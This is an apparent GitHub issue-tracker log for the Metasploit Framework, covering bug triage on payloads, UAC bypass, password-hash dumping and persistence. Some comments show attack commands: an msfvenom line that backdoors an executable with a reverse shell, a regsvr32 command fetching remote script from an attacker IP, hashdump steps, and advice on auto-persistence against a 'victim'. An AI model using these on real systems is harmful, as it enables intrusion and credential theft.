[2017-02-07 10:46] busterb commented on #7925
See https://github.com/rapid7/metasploit-omnibus/pull/14/files for instance to find those wrapper script templates.

[2017-02-07 10:50] wvu-r7 commented on #7925
@funoverip: Consider using `msfvenom -o` for now.

[2017-02-07 11:01] busterb commented on #7925
Fix above ^

[2017-02-07 12:06] funoverip commented on #7925
Awesome !

[2017-02-07 13:23] Anonymousismyname commented on #7926
Im running 64bit parrot os on vbox. I think all are 64 bit. I dont know about payload arch.  Do you mean the payload i used to exploit? Then i used fatrat pwnwind. Im not sure if it is x64.

[2017-02-07 15:43] Anonymousismyname commented on #7926
Im getting same error even if i use x64 payload, x64 process and x64 target!

[2017-02-07 15:52] void-in commented on #7926
@Anonymousismyname The parrot os is your attacker machine. It doesn't matter what arch it is. What OJ said above is that if your target machine i.e. the Windows is x64, then:

1. - Then the current meterpreter session should be x64 (migrate into an x64 process)
2. - The PAYLOAD configured with the UAC bypass module should be x64 (e.g. set PAYLOAD windows/x64/meterpreter/reverse_tcp
3. - Set the ex

[2017-02-07 15:55] jvoisin opened #7927 "Stacktrace using post/multi/recon/local_exploit_suggester"
## Steps to reproduce

[code]

## Expected behavior

Exploits should have been suggested for the selected session.

## Current behavior

A stacktrace happened.

## System stuff

[code]

### Metasploit version

[code]

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/dow

[2017-02-07 23:35] h00die commented on #7927
My guess is https://github.com/rapid7/metasploit-framework/pull/7369/files#diff-173b8918938aef5d92f4b9b3dfc323d6R63 needs an `else` case.
What was the target's OS details?

[2017-02-08 04:15] Anonymousismyname commented on #7926
Believe me i did the exact same. Used x64 payload. Migrated to a x64 process. And set the target to x64 windows.i even did the opposite. Made a x86 payload, and was in x86 process and set the target to x86 windows. I get the same error!

[2017-02-08 05:33] void-in commented on #7926
I am testing with the latest git pull snapshot.

[code]
As you can see, I am not able to reproduce it. The target machine is a 64-bit Windows 7.

[2017-02-08 08:51] jvoisin commented on #7927
I think it was a Windows Server 2003, in French.

[2017-02-08 13:19] Anonymousismyname commented on #7926
i also did try bypassuac_eventvwr before,it returned me to command prompt and when i typed whoimi it showed the "username of the user" not "NT AUTHORITY\SYSTEM" tho when i typed "meterpreter > getsystem" it said got system via technique 1. but i wasnt admin.
and im trying bypassuac_injection which stops at "Exploit aborted due to failure: bad-config: x86 Target Selected for x64 System" my meterpre

[2017-02-08 13:21] Anonymousismyname commented on #7926
tho it works in x86 windows when i used simple payload(not windows/x64/meterpreter/reverse_tcp) and was (obviously in x86 process)

[2017-02-08 13:55] Anonymousismyname commented on #7926
i tried again
im in x64 process::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
meterpreter > ps

Process List
============

 PID   PPID  Name                 Arch  Session  User                  Path
 ---   ----  ----                 ----  -------  ----                  ----
 0     0     [System Process]
 4     0     System
 312   4     smss.exe
 380   43

[2017-02-08 14:48] #7925 closed

[2017-02-08 14:55] busterb commented on #7925
Thanks, sorry for the surprising behavior and ensuing goose chase!

[2017-02-08 15:46] timwr commented on #7841
@mame82 I updated #7860, it works for me now

[2017-02-08 21:27] OJ commented on #7926
I've tested both of these modules locally, on x64 and x86 and I'm not getting the same problem as you.

When you use either of these modules, you'll get a new session that is running as the user, not as `SYSTEM`. But, the session should be elevated, so `getsystem` should give you the `SYSTEM` token. I'm not sure why you're using web delivery here when it isn't needed.

Are you doing this in a Lab

[2017-02-08 22:35] zeroSteiner commented on #7367
I'm going to take a look at this. I'm guessing it's related to rapid7/metasploit-payloads#144 but I'll see if I can reproduce it.

[2017-02-08 23:00] busterb commented on #7367
You're probably right!

[2017-02-09 03:19] Anonymousismyname commented on #7926
I wasn't even able to produce a session. Let me try once more. I was just testing it.
No im testing it in vbox.

[2017-02-09 05:48] p3nt4 opened #7936 "Hash and Cache dump in windows 10"
It seems like an update changed the way windows stores cached passwords and local hashes.
Did anyone figure out a way to dump local passwords as of today?

## Steps to reproduce
1. Get a system meterpreter shell
2. Run post/windows/gather/hashdump

## Expected behavior

Using hashdump should give the current hash of users.

## Current behavior

Using hashdump gives the empty password hash.
Example

[2017-02-09 12:17] Auxilus commented on #7814
@anthraxx When the issue with ruby 2.4 gonna be fixed?

[2017-02-09 12:20] Auxilus commented on #7814
@anthraxx how do I use that .Patch file?

[2017-02-09 13:27] Anonymousismyname commented on #7926
Hey it works on a normal backdoor, which is created by msfvenom. I think the fatrat had a x86 payload. But it also did not work with web_delivery.

[2017-02-09 13:29] mame82 commented on #7841
@timwr

Works like charm!!!!!

Setup on the Kali box:

[code]

... and the following test setup on an nginx proxy:

[code]

Traffic travels

[code]

This setup is beautiful and highly flexible:
* payload redirection via URI path --> possible
* payload redirection via different URL --> possible
* single SSL Cert for different payload connections --> possible
* victim behind NAT and payload handler

[2017-02-09 14:07] Anonymousismyname commented on #7926
Im closing this since it is solved. U need to make sure ur payload of the created backdoor be x64.use own created backdoor.

[2017-02-09 14:07] #7926 closed

[2017-02-09 14:54] kaospunk commented on #7367
I tested this on macOS 10.12.3 using the native system python as well as a version from brew. I tested using the latest version of metasploit from git:
Framework Version: 4.13.21-dev-cba5e26

**The latest version works properly for me which both python installs in that sessions are established and I can interact with the session with no issue.**

To test the older versions of the python meterprete

[2017-02-09 16:40] Auxilus opened #7937 "Metasploit framework support for ruby 2.4"
Though the metasploit framework is now configured to run on ruby 2.4 ... It's been pointed out that some of its dependencies steel unsupport ruby 2 4.
That's causing MSF fail to run..
Please resolve..
Thanks..

[2017-02-09 16:44] busterb commented on #7937
We already have an issue for this, you commented on it already. #7814

[2017-02-09 16:44] #7937 closed

[2017-02-09 16:46] busterb commented on #7814
We are entirely dependent on code outside of our control being updated first. See #7819 for a list of upstream projects to pester about merging Ruby 2.4 support.

[2017-02-09 17:02] busterb commented on #7367
Same thing here. I'm going to close this, feel free to reopen if you find any counter-examples.

[2017-02-09 17:02] #7367 closed

[2017-02-09 17:12] busterb commented on #7814
If you're getting antsy, grab https://github.com/bcook-r7/metasploit-framework/blob/c5d435fbf5d943d90d500d4459f92f78f11d1c4c/Gemfile and replace your current Gemfile with it. Then run 'bundle update.

[2017-02-09 17:13] busterb commented on #7814
Alternately, use rvm to install Ruby 2.3.3 for now. It supports just about every distribution under the sun.

[2017-02-09 17:16] Auxilus commented on #7814
How do I do that?
Please walk me through...
I'd appreciate if give me path of command
So that I can execute them one by one ...

[2017-02-09 17:18] Auxilus commented on #7814
And how do I do that all in an app called termux?
Do I have to clone entire repository for that ?
Or is there a way around ?

[2017-02-09 17:20] busterb commented on #7814
Well, this isn't really a support channel, and I think you're going to have rouble if you're not really even sure how to use a terminal emulator. Maybe hop on #metasploit

[2017-02-09 17:23] Auxilus commented on #7814
Well...I am totally aware of using terminal ..
I can do it all on Linux but problem is I want MSF on an app termux for Android..
I've never came to such condition ...
So I wanted help..
Hope you get it

[2017-02-09 17:24] Auxilus commented on #7814
Every body needs to learn it in first time ..
You can't just download that knowledge when you download the app...

[2017-02-09 17:31] Auxilus commented on #7814
And besides...I am only 16yrs old..

[2017-02-09 17:38] busterb commented on #7814
Hop on #metasploit, we'll help you out.

[2017-02-09 17:45] Auxilus commented on #7814
Thanks

[2017-02-09 17:53] Auxilus commented on #7814
BTW "hop on #metasploit" means I tweet to you guys right?

[2017-02-09 18:19] Giampli opened #7938 "Couldn't find the PE magic!"
## Steps to reproduce
I used command:

`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.250 LPORT=4444 -f exe-only -b "/x00" -x ~/i_view64.exe -k -o iview64.exe; file iview64.exe; file i_view64.exe`

Tried with other 64bit software, same result.
It should create an exe with the payload injected, but it show an error: "Error: Couldn't find the PE magic!"

Log of the error:

[code]

[2017-02-09 19:51] wneessen commented on #7814
No, he means you should hop on the #metasploit IRC channel

[2017-02-09 19:53] wneessen commented on #7814
Btw. @anthraxx. The patch didn't work for me. But as I needed a working installation quickly, I was able to "downgrade" to 2.3 using RVM

[2017-02-09 20:46] egypt commented on #7899
Still affects `ssh_login_pubkey` on master:

[code]

[2017-02-09 21:41] #7899 closed

[2017-02-09 22:01] bwatters-r7 commented on #7936
I ran this on a fully-patched windows 10x64 machine:
![image](https://cloud.githubusercontent.com/assets/17987018/22804755/1e384afc-eee0-11e6-8336-529f2c0a64c1.png)
With this release of msf:
commit 272d1845fa5a806355f328ea4b12dd38c483abff
My results match yours, I think, but there may be some confusion.  Disabled local admin accounts will have the hash 31d6cfe0d16ae931b73c59d7e0c089c0, and the def

[2017-02-09 22:48] p3nt4 commented on #7936
All users, enabled and disabled have the same blank hash.

I originally noticed this issue while I was writing the hashcarve module. What's interesting is that passwords that were set before a certain update (possibly anniversary edition) are not affected.

Concerning the Cachedump, I get different hashes for every user, however, I can't crack them using John with cash2 format so the hashing algor

[2017-02-09 23:42] bwatters-r7 commented on #7936
Ahhh; OK.  That is odd.  I reread your post, and I relaize that was not Administrator, but LocalAdmin with a clearly not 500 ID (Sorry about that).  I went ahead and reran some tests; my user was created a while ago, so it is unaffected in the previous test, too.  I created a new user per your suggestion, and indeed, I get the blank hash when I run the post module against a newly-created user, but

[2017-02-10 00:05] p3nt4 commented on #7936
How do you run your hashdump? Neither of them work for me:

`

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 1a5b8591d4cd4e21

[2017-02-10 00:33] bwatters-r7 commented on #7936
My bad; there a command that you can run from the meterpreter prompt that is simply 'hashdump'  I would post the whole thing, but my Windows VM is no longer accepting ARP responses.....  I'm not sure why, but I'm in the middle of a 12 hour long download, so rebooting is not an option.

It would just be:
[code]
or alternatively:
[code]
Then you can do a full lsass dump with
[code]

[2017-02-10 00:35] bwatters-r7 commented on #7936
There was a recent update to Kiwi (~6 wks), but that should be long enough for Kali to have picked it up.
https://github.com/rapid7/metasploit-framework/pull/7744

[2017-02-10 00:38] p3nt4 commented on #7936
I know about hte hashdump command but I get the following error on my windows version:
`

[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
`

[2017-02-10 15:51] bwatters-r7 commented on #7936
Whew.... after a reboot, I have layer 2, yet again!

OK.... so, now for some explaining....

```post/windows/gather/hashdump``` does appear to be broken for recently-created hashes (crap).

kiwi still works as expected for logged-in users (Yay!)

```hashdump``` works for me because under the covers, it calls a script that then calls the post module ```post/windows/gather/smart_hashdump```  It fail

[2017-02-10 17:28] Wack0 commented on #7907
@scriptjunkie I basically did it really hackily: adding back the old "RECV" functionality, then sending that on HTTP GET to the php script; then setting up the UUID properly so that stdapi would send properly.

[2017-02-10 19:43] bwatters-r7 commented on #7936
Well..... turns out there's more.

In digging....
There was a script called hashdump and there is a post module called hashdump, a post module called smart_hashdump, and then a command called hashdump.  I was wrong to confound the hashdump command with the hashdump script that got hijacked to call the post module smart_hashdump.  Each of these 4 things is different.  The post modules both rely on

[2017-02-10 21:50] p3nt4 commented on #7936
Thanks for the research. Good to know it is still possible to dump hashes. I assume meterpreter still gets the hashes from the registries, will need to look into that and patch the post module if I have time.

[2017-02-10 22:09] bwatters-r7 commented on #7936
Well, despite being wrong above at least once, I'm going to take another shot in the dark.  I bet that meterpreter gets the hashes by injecting a thread into lsass and pulling them from memory directly like fgdump or kiwi.  That would explain why a change in the layout of the registry file would break the post modules, which rely on the registry, but not the meterpreter and kiwi tools that pull di

[2017-02-10 22:15] p3nt4 commented on #7936
Yeah, that seems like a valid hypothesis. Would be interesting to reverse engineer the new registry layout then.
Have you had a chance to take a look at cachedump? I fear the hashing algorithm may have changed as well :(.

[2017-02-11 00:42] bwatters-r7 commented on #7936
I did not look at cachedump.  I am going to be occupied this coming week, but I sent a note to a few people about this issue.  If it is still around after next week, I can take a look at it again.

[2017-02-11 08:03] 0x41414141 opened #7945 "Feature Request: DCERPC Capture Module"
I'd like to see a module to capture NTLMSSP exchanges within DCERPC (tcp port 135) within the framework c.f exploit/server/capture/smb but for DCERPC authentication.

Background:
I was recently on a test and managed to get a login to a Manageengine Opsmanager instance which was configured with several privileged domain credentials (the plaintext of which could not be exported through backups or th

[2017-02-11 14:28] void-in commented on #7936
@bwatters-r7 Regarding your shot in the dark, you indeed hit the bull's eye. The meterpreter hashdump command injects a thread and pull the hashes from lsass. But sometimes it results in the BSOD. That was the whole point creating the smart_hashdump module since it only queries the registry and are more safe to be used in production environment.

[2017-02-13 00:18] h00die commented on #7927
if you still have access to the target, can you test this patch i just submitted?

[2017-02-13 02:31] carnal0wnage opened #7948 "auxiliary/scanner/ntp/ntp_monlist Auxiliary failed: ArgumentError wrong number of arguments (0 for 2)"
## Steps to reproduce
[code]
msf auxiliary(ntp_monlist) > version
Framework: 4.13.22-dev-face944
Console  : 4.13.22-dev-face944

`~/.msf4/logs/framework.log` for relevant stack traces
[code]

## System stuff

### Metasploit version

Get this with the `version` command in msfconsole (or `git log -1 --pretty=oneline` for a source install).

### I installed Metasploit with:
- [ ] Source install (plea

[2017-02-13 04:03] wvu-r7 commented on #7948
This looks like a regression from #7774 for modules including the `Msf::Auxiliary::UDPScanner` and `Msf::Exploit::Remote::Udp` mixins. There appears to be a name collision for `udp_sock` (method vs. accessor). Should be a simple fix to rename the method, since it appears to be used within `UDPScanner` only. cc @bcook-r7

[2017-02-13 04:28] busterb commented on #7948
Sure - it can be udp_socket instead (presuming this doesn't conflict with another thing)

[2017-02-13 04:28] busterb commented on #7948
Barring that, B147FA83-8F6F-41A9-84BD-7A970933BC03 is also a nice method name.

[2017-02-13 04:46] wvu-r7 commented on #7948
The plight of Metasploit's mixin architecture. :)

[2017-02-13 04:51] #7948 closed

[2017-02-13 10:55] nixawk commented on #6208
@jhart-r7 Is that a valid way to make db_import support the masscan xml ? ex:

[code]

[2017-02-14 07:19] Anonymousismyname opened #7955 "Persistence error?"
K so all things work fine with persistence but when i dont listen or quit msfconsole. I see that the victim pc gets error "windows script host"  line 29 char 2.the system cannot find the file specified. And my victim  pc win 7 on vm can see the file location as it pops on the dialog box. If this is normal then persistence is of no use? Im i doing something wrong?

[2017-02-14 08:18] void-in commented on #7955
Did you use the persistence script or the post module?

[2017-02-14 11:28] Anonymousismyname commented on #7955
I used persistence script.

[2017-02-14 16:08] chris2lamb opened #7957 "can't connect to msfdb"
I am running Linux kali 4.9.0-kali1-amd64 #1 SMP Debian 4.9.6-3kali2 (2017-01-30) x86_64 GNU/Linux

I installed the Metasploit framework as indicated in the metasploit doc pdf (page 6).
After having completed the installation (metasploit v4.13.23), I can't connect to the db and can't have access to msfdb commands:

msf > db_status
[*] postgresql selected, no connection
msf > msfdb
[*] exec: msfdb

[2017-02-14 16:17] h00die commented on #7957
This sounds more like a support issue than a bug.  For support, please join #metasploit on IRC

[2017-02-14 16:17] #7957 closed

[2017-02-14 20:02] mame82 commented on #7841
@timwr What about a PR?

[2017-02-14 21:48] wchen-r7 opened #7958 "Using JWT for BrowserExploitServer"
The BrowserExploitServer mixin does not validate the legitimacy of the data that contains browser information, which means anybody can lie to BES by modifying the encoded data, and cause inaccurate detection and reporting

I'm interested in using JWT, which basically signs the data to avoid this kind of stuff.

[2017-02-14 22:28] #7958 closed

[2017-02-14 22:38] wchen-r7 opened #7959 "Automatically renew RPC client token"
Every 5 minutes, the RPC client's token expires, and requires the script/user to either:

1. Reconnect to the server

Or

1. Call ```auth.lgoin```
2. Manually update ```self.token```

It seems it's better off to automatically relogin and renew the token.

[2017-02-15 12:26] re8el opened #7961 "tomcat_mgr_upload"
## Steps to reproduce

How'd you do it?

1. use exploit/multi/http/tomcat_mgr_upload
2. with payload java/meterpreter/reverse_tcp but using the windows/meterpreter/reverse_tcp has the same result
[code]

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

[2017-02-15 13:16] h00die commented on #7961
what version of tomcat is installed on the target?

[2017-02-15 15:04] vmarquet commented on #7555
Could the documentation please be modified to mention the `rake db:test:prepare` command?

This is not specified anywhere and everyone following the documentation to the letter will be stuck at "You should see over 9000 tests run, mostly resulting in green dots, a few in yellow stars, and no red errors.", which won't be true. Given the verbose output of the failing tests, this issue and the soluti

[2017-02-15 15:08] busterb commented on #7555
Yeah, this bugs me too. Let's reopen this.

[2017-02-15 15:09] busterb commented on #7555
Strangely, I'm almost positive that at some point in the past, one merely had to run 'rake spec' and this would work automatically. I wonder if the order of tests got somehow changed implicitly along the way, causing it to start failing.

[2017-02-15 18:12] re8el commented on #7961
Hi h00die,

Apache/Tomcat 6.0.18 with JVM 1.6.0_25-b06

[2017-02-15 20:56] darkbushido commented on #3740
can we close this? #7892 landed and it lets you create logins with the creds command

[2017-02-15 21:06] busterb commented on #3740
Yep.

[2017-02-15 21:06] #3740 closed

[2017-02-15 22:37] Manouchehri commented on #6869
Small follow-up, CVE number has been assigned. #7965

[2017-02-16 05:56] h00die commented on #7961
Looks like https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/tomcat_mgr_upload.rb#L422 is the line.

Can you try removing `.downcase` from there and trying again?  Strange to me why that would be downcased since passwords are case sensitive, plus it looks like tomcat_mgr_deploy and tomcat_mgr_upload are the only two that do it.

[2017-02-16 14:02] Romain6 opened #7970 "OpenSSL::SSL::SSLError"
Hi, this issue has already been reported but it seems I don't understand answers.

## Steps to reproduce

[code]

## Expected behavior

Well, a meterpreter.

## Current behavior

[code]

[code]

### Metasploit version

Framework: 4.13.15-dev
Console  : 4.13.15-dev

### I installed Metasploit with:

Kali package via apt

### OS

Launch from Kali :
Linux kaliRD 4.8.0-kali2-amd64 #1 SMP Debian 4.8.15

[2017-02-16 14:20] timwr commented on #7970
Can you try with `set payload linux/x86/mettle/reverse_tcp` please?

[2017-02-16 14:33] Romain6 commented on #7970
That is what I get :

[code]
[code]

There is no SSL error, but not working too

[2017-02-16 14:47] re8el commented on #7961
problem solved!

thks! ;)

[2017-02-16 17:26] pentesterd opened #7971 "Exploit apache_mod_cgi_bash_env_exec - Does not accept any payload"
## Steps to reproduce

1. use exploit/multi/http/apache_mod_cgi_bash_env_exec
2. set RHOST and TARGETURI options
3. show payloads returns a blank
4. set PAYLOAD linux/x86/meterpreter/reverse_tcp
5. set LHOST
6. exploit

`
msf exploit(apache_mod_cgi_bash_env_exec) > exploit

[-] Exploit failed: linux/x86/meterpreter/reverse_tcp is not a compatible payload.
[*] Exploit completed, but no session was

[2017-02-16 18:01] void-in commented on #7971
Exploits have different restrictions such as the allowed space, bad chars, target arch, available commands on the platform etc. All of these variables determine the available payloads. When you select the exploit through the use command, run "show payloads" and select one from the displayed list. If you need further support, please use https://community.rapid7.com

[2017-02-16 23:58] rwhitcroft commented on #7938
msfvenom doesn't like your template EXE. What does `file i_view64.exe` say? You probably don't need to specify `-b` (your slash is backwards btw) - try without that.

This worked for me:
[code]

[2017-02-17 00:12] #7959 closed

[2017-02-17 00:25] pentesterd commented on #7971
show payloads returns blank!

[2017-02-17 02:15] timwr commented on #7970
Weird, it looks like the exploit is working (`Sending stage`) but meterpreter isn't, not sure why. Maybe you can try `set payload linux/x86/shell/reverse_tcp` OR `set payload linux/x86/shell_reverse_tcp`

[2017-02-17 05:29] void-in commented on #7971
Re-opening again. The payload list is indeed blank. Thanks for reporting.

[2017-02-17 06:04] void-in commented on #7971
The issue is related to the targets. The default target is Automatic. When a specific target is selected such as Linux x86 or Linux x86_64, the payload list works.

@wvu-r7 May be this is again related to the auto targeting issues we have faced?

[2017-02-17 10:15] Romain6 commented on #7970
It is working with shell, only the meterpreter doesn't :s
What is strange is that SSL is enable with a reverse tcp, and the SSL option set to false

[2017-02-17 10:57] Giampli commented on #7938
Ok, now it works, but the program doesn't work fine even if i use -k. But i can start a session on meterpreter

[2017-02-17 12:49] pentesterd commented on #7971
On selecting specific targets, the payload list still does not work. And whichever payload is selected, returns incompatible payload. Do keep in mind, that the same payloads had worked before.

[2017-02-17 13:56] void-in commented on #7971
@pentesterd You mean if you do ```set TARGET 0``` or ```set TARGET 1``` and then run ```show payloads```, you are still not able to view any compatible payloads?

[2017-02-17 14:17] pentesterd commented on #7971
msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf exploit(apache_mod_cgi_bash_env_exec) > show options

Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CMD_MAX_LENGTH  2048             yes       CMD max line length
   CVE             CVE-2014-6271

[2017-02-17 14:29] pentesterd commented on #7971
Ok. If you do `show targets` and set TARGET to 1/2 it does show the list of payloads.

[2017-02-17 14:30] pentesterd commented on #7971
If this is not a bug, but intended behavior, then please close it

[2017-02-17 14:34] void-in commented on #7971
@wvu-r7 So Automatic target should select the first available target if there is no fingerprinting available? I am not sure what the intended behavior is here.

[2017-02-17 17:15] #7841 closed

[2017-02-17 17:57] pbarry-r7 commented on #7817
Say @greenhand2learn, what OS was your target running?  I was looking at the module code, and it appears that we could end up looking for /home/root if the `id` command is returning something different than we expect...

[2017-02-17 20:09] #7927 closed

[2017-02-17 21:04] wvu-r7 commented on #7971
This looks like another regression from #7766.

[2017-02-17 21:04] pbarry-r7 commented on #7903
It appears the formatting of port name+number+protocol in this XML file differs from what the importing code currently expects.  Specifically, MSF is expecting to parse each < port > element contents as `name (number/protocol)` (e.g. `https (443/tcp)`), but this XML that MSF is having issues importing has < port > contents listed as `number/protocol (IANA: name)` (e.g. `80/tcp (IANA: www-http)`).

[2017-02-17 21:11] wvu-r7 commented on #7971
Actually, this looks like intended behavior.

[2017-02-17 21:14] wvu-r7 commented on #7971
This can be improved, though. We're discussing it.

[2017-02-17 21:32] wvu-r7 commented on #7971
@bcook-r7 and I are writing a patch. :)

[2017-02-17 21:38] h00die commented on #7971
Dang, @pentesterd is getting the #A_team

[2017-02-17 21:46] wvu-r7 commented on #7971
We're having the autogenerated `Automatic` target merge in the target hash from the original `DefaultTarget`. You know, the way it should be.

[2017-02-17 22:05] #7971 closed

[2017-02-17 22:06] wvu-r7 commented on #7971
Fixed! :cake:

[2017-02-17 22:58] wvu-r7 commented on #7961
Dammit, another one. I fixed one already. There was no reason for the `downcase`, and the author of that code didn't know why either.

[2017-02-17 23:00] h00die commented on #7961
I plan on PRing this tonight

[2017-02-17 23:00] wvu-r7 commented on #7961
Related to #7529.

[2017-02-17 23:22] dmohanty-r7 commented on #7912
Great PR, @sn0wfa11. Printing routing table with both ipv4/ipv6 works for me as well.

[code]

[2017-02-17 23:52] dmohanty-r7 commented on #7912
Fixed with #7913

[2017-02-17 23:52] #7912 closed

[2017-02-18 03:11] greenhand2learn commented on #7817
@pbarry-r7 　target OS is kali linux

[2017-02-18 16:06] #5604 closed

[2017-02-18 17:05] busterb commented on #5604
Sorry for the late update, it appears to work correctly now. Thanks!

[code]

[2017-02-18 23:20] pbarry-r7 commented on #7817
Cool, thanks, @greenhand2learn.  Could you tell me which meterpreter you were using?  I've got a Kali (rolling) VM that I've tried the python and java meterpreters with, they appear to be acting OK (just FWIW).  Thanks!

[2017-02-19 00:18] pbarry-r7 commented on #7817
Ah, I tried the linux meterpreter (x86), and appears that's the culprit (and it looks like the mettle payload also might be doing the same thing).  More digging...

[2017-02-19 05:26] greenhand2learn commented on #7817
@pbarry-r7  Yes. it's  linux meterpreter (x86)

[2017-02-19 16:38] jvoisin commented on #7927
Sorry, I don't have access to it anymore, but your patch looks right to me.

[2017-02-20 01:55] ChrisFernandez commented on #7814
Any news on this?

[2017-02-20 02:43] wvu-r7 commented on #7955
Use a module.

[2017-02-20 02:43] #7955 closed

[2017-02-20 03:27] #7961 closed

[2017-02-20 04:29] busterb commented on #7957
This is actually a common problem for Kali Linux users specifically when running as root using the omnibus package, rather than Kali's own Linux package. Kali manages the database differently, preferring to use the system rather than user database.

I put a PR on the omnibus package to fallback to Kali's method if root user is detected: https://github.com/rapid7/metasploit-omnibus/pull/46

[2017-02-20 04:35] busterb commented on #7957
Also, note that 'msfdb' is a standalone program, not something you need to run from metasploit itself. Generally, unless you can't wait a week or so for Kali to grab the latest metasploit tag, you might as well just use the builtin package. But, with the above PR, the experience should be effectively the same as using Kali's native package, if you're running as root. I left the original behavior f

[2017-02-21 14:48] Megaeloelo opened #7983 "Add samsung CVS 2016-0004 AT command injection exploit"
Hello,
I wanted to know if someone will be interested adding this:
https://github.com/ud2/advisories/tree/master/android/samsung/nocve-2016-0004
to metasploit and make it work on other devices. I don't have much skill to do it on my own.
I don't know is it even possible :(

[2017-02-21 17:59] wchen-r7 opened #7984 "NoMethodError undefined method `match' for nil:NilClass in login_scanner/bavision_cameras.rb"
```NoMethodError undefined method `match' for nil:NilClass``` when the web server does not have a ```WWW-Authenticate``` header

[2017-02-21 18:04] neinwechter commented on #7983
I think this would require the Ruby libusb - so the core dev team will need to comment on whether that's something that they would be willing to include. It purports to be cross-platform, which at least satisfies one major requirement. But using libusb introduces the need to install drivers, which increases some installation and maintainability complexity.

If there's a willingness to bring the li

[2017-02-21 18:45] busterb commented on #7503
Are you running msfconsole itself without a tty? If so, this is probably not a mettle issue, but a readline problem

[2017-02-21 19:42] thecarterb opened #7986 "UTF-8 characters allow deletion of command prompt"
## Steps to reproduce

Video example:

[![asciicast](https://asciinema.org/a/9ojr6jw20nzfvjzs6gg18so72.png)](https://asciinema.org/a/9ojr6jw20nzfvjzs6gg18so72)

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Expected behavior

The prompt shouldn't

[2017-02-21 19:47] thecarterb commented on #7986
Side note: the reason I haven't updated the framework is because when I run `msfupdate`, the `metasploitframework-latest.pkg` doesn't verify, but that's for a separate issue. If it's a version issue, than this can be closed.

[2017-02-21 20:29] busterb commented on #7503
If you can reproduce this, it should affect every meterpreter session as well. We tried a few times with Ruby 2.3 and 'ssh -T' and were not able to reproduce a failure.

[2017-02-21 20:31] #7984 closed

[2017-02-22 11:08] jvoisin commented on #7503
`msfconsole` was running inside a tty. I don't have access to the machine anymore :/

[2017-02-22 13:42] str4n63r opened #7988 "Error while running command services: comparison of Array with Array failed"
Hello,

I tried using Shodan API through Metasploit and enabled database storage of results as well while using this auxiliary module. But after running the **auxiliary/gather/shodan_search** when I tried "services" to identify the results Metasploit throwed me below error instead search results.

## Current behavior
[-] Error while running command services: comparison of Array with Array failed

[2017-02-22 17:17] busterb commented on #7503
Thanks! Since it doesn't seem to affect Ruby 2.3 in every way we could try, I'm going to close for now.

[2017-02-22 17:17] #7503 closed

[2017-02-22 17:31] krzys-h opened #7989 ""Session manipulation failed: undefined method `write' for #<Rex::Ui::Text::Output::Buffer>" after session.meterpreter_run_single RPC"
Hi! I have a problem with msfconsole crashing and hanging an interacting meterpreter session when trying to use it alongside the RPC interface.

## Steps to reproduce

1. Load rpc server module: `load msgrpc`
2. Connect any meterpreter session
3. Start interaction with the session: `sessions -i 1`
4. From another terminal window, connect to the RPC server: `msfrpc -U msf -P XXXXXXXX -a 127.0.0.1 -

[2017-02-22 17:51] bwatters-r7 commented on #7986
This is something I've noticed and let simmer in the back of my mind.  I assume this problem is based on an outdated model where we confounded bytes with characters, and when you insert a multibyte character, the output system thinks that there are 2 characters rather than one character with multiple bytes, so when tracking the output length, it assumes that six bytes will always have six characte

[2017-02-22 17:59] bermannoah commented on #7188
Hey, is this issue still up for grabs? (Has it been fixed already?) Would like to try to tackle it if I can. Thanks!

[2017-02-22 18:47] NoorQureshi opened #7991 "msfvenom persistence guide"
i've a question regarding msfvenom...

if we create an windows exploit and our victim execute that file!!! i don't wanna wait for him/her to open that file so i can persistence our connection! i want that payload to auto persistence my connection so if i were offline the time my victim open that payload so later i can connect to payload....

without waiting for him to open that file! is that possi

[2017-02-22 19:45] thecarterb commented on #7991
When starting a `multi/handler` you can set the `AutoRunScript` option to run persistence. Sample console output:

[code]

When a session is established, it'll automatically run whatever you have set there

[2017-02-22 20:03] NoorQureshi commented on #7991
Yes i can use AutoRunScript... sorry i didn't explain well, what if the victim opens the file when im not listening.. because i cannot use exploit -j and wait for my victim to open that file! he can probably run another day then how am i gonna establish the connection then? AutoRunScript comes later when we want the persistence connection we we're already connected to victim! ... i hope you unders

[2017-02-22 20:05] thecarterb commented on #7991
the persistence script runs whether or not you are listening. But whenever you are listening, you should establish another session

[2017-02-22 20:09] NoorQureshi commented on #7991
No bro you didn't understand! What if my victims open the exploit and I'm AFK how would i exploit -j then? because im not listening to payload continuously. What if my victim opens that payload another day and how im gonna get session then?

[2017-02-22 20:13] thecarterb commented on #7991
I suppose instead of using `msvenom`, generate the exe on `msfconsole` with `AutoRunScript` set.

[code]

Something like this should generate it

[2017-02-23 00:46] h00die commented on #7188
no PR submitted, go for it!

[2017-02-23 02:44] thecarterb commented on #7991
@NoorQureshi Any luck?

[2017-02-23 06:53] 01010w4 opened #7998 "Exception handling while 'victim' is running regsvr32_applocker_bypass_server.rb"
##  Exception handling while running on Windows 7 x64, Windows 10 x64

How'd you do it?

1. ... use exploit/windows/misc/regsvr32_applocker_bypass_server
2. ...setting LHOST 192.168.133.132, LPORT 4444, running 'exploit' command
3. ...running generated command  regsrv32 /n /s /u /i:http://192.168.133.132..... scrobj.dll on Windows 7 x64 and as a result exception handling while running regsvr.

![i

[2017-02-23 08:49] void-in commented on #7998
On the latest git snapshot, I am not able to reproduce.
[code]
From your description it seems you have downloaded only the module rb file without having the supporting lib files since the module is running from the .msf4/ directory. Have you downloaded this file yourself?

[2017-02-23 09:09] 01010w4 commented on #7998
@void-in It's new installed Kali linux VM, previously it worked, so I didn't download any other libs.
Can you please write which libs and from where to download?

